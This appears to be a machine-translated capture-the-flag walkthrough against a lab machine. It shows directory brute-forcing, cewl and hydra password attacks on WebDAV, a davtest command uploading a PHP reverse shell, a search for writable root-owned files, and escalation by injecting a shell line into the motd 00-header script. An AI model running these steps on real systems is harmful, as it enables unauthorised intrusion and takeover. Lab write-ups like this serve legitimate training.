Catalog

One 、 Full open scan

Two 、 Service version detection

3、 ... and 、 information gathering

Four 、dirsearch Catalog explosion

1. Default dictionary

2.dirb Common Dictionaries

5、 ... and 、webdav

6、 ... and 、cewl Custom dictionary

7、 ... and 、hydra Blast

8、 ... and 、davtest Upload bounce shell

1. Test statement

2. Upload php

3. Monitor execution

  Nine 、0day Raise the right

Ten 、 Normal right raising

 1. information gathering

11、 ... and 、BF Language

Twelve 、modo Inject

 1. information gathering

2.motd 

3. modify 00-header file

4.su root

One 、 Full open scan

Two 、 Service version detection

3、 ... and 、 information gathering

No interface is found in the source code comment , Source code leakage , Hide directories, etc

either robots.txt,readme.txt file .

No files contain ,sql Inject ,xss And other common vulnerabilities

Other jump pages also have no information that can help us manage our success

Four 、dirsearch Catalog explosion

1. Default dictionary and status code 401

401 Indicates that the directory exists , But it needs to be verified

403 Indicates that a directory or file exists , But refuse to request resources , Because of the server configuration

404 not found No .

2.dirb Common Dictionaries

dirsearch -u http://192.168.29.135 -f -e html,txt,php -w /usr/share/wordlists/dirb/common.txt

Here is a tips.txt, But this information is useless

5、 ... and 、webdav

webdav effect ：

Is based on http1.1 A communication protocol , Be similar to ftp An agreement of , You can upload and download files . This is our breakthrough point , Try admin/admin guest/guest root/root And other common weak passwords . Not successful . We have to blow up , But I don't even know the user name , This blasting is too difficult . So try to customize the dictionary to attack

6、 ... and 、cewl Custom dictionary

working principle ： Crawl through the crawler to get the corresponding URL Various resources on , Through analysis and combination , Generate a dictionary .

cewl  http://192.168.29.135/ > dict.txt

perhaps

cewl  http://192.168.29.135/ -w dict.txt

7、 ... and 、hydra Blast

[email protected]

Successfully logged in

8、 ... and 、davtest Upload bounce shell

1. Test statement

davtest -auth yamdoot:Swarg -url http://192.168.29.135/webdav

Which can be uploaded , What can be executed , Be crystal clear

There is a target here php Running environment

2. Upload php

  What we use is kali There is one php rebound shell

davtest -auth yamdoot:Swarg -uploadfile php-reverse-shell.php  -uploadloc exp.php  -url http://192.168.29.135/webdav

3. Monitor execution

  Nine 、0day Raise the right

  adopt CVE-2021-3479 Right to come .

The target didn't gcc Compiler tools , Upload and execute after local compilation .

Ten 、 Normal right raising

 1. information gathering

Find a subordinate as root, Permissions belong to the master and the group, which can be executed , Other documents that can be written , Find one hell.sh file , Check the content and find that it is a paragraph BF Words of language

find / -user root -type f -perm -ug=x,o=w -exec ls -al {} \; 2>/dev/null

11、 ... and 、BF Language

  The full name is brainfuck

This website executes this language , Get a string of characters ：chitragupt, Try to get the permission of a normal user as a password ,ssh here we are inferno This user

tio.run/#brainfuck

first flag.txt

Twelve 、modo Inject

 1. information gathering

There is one 00-header file , And it's a shell Script

2.motd 

motd English full name ：message of the day Chinese interpretation ： Daily tips , The function is that when we log in , To execute motd file , Achieve the purpose of prompt . The rest of us also have the right to modify , And the owner is root, Can be used to raise rights .

3. modify 00-header file

Add... At the end shell sentence

4.su root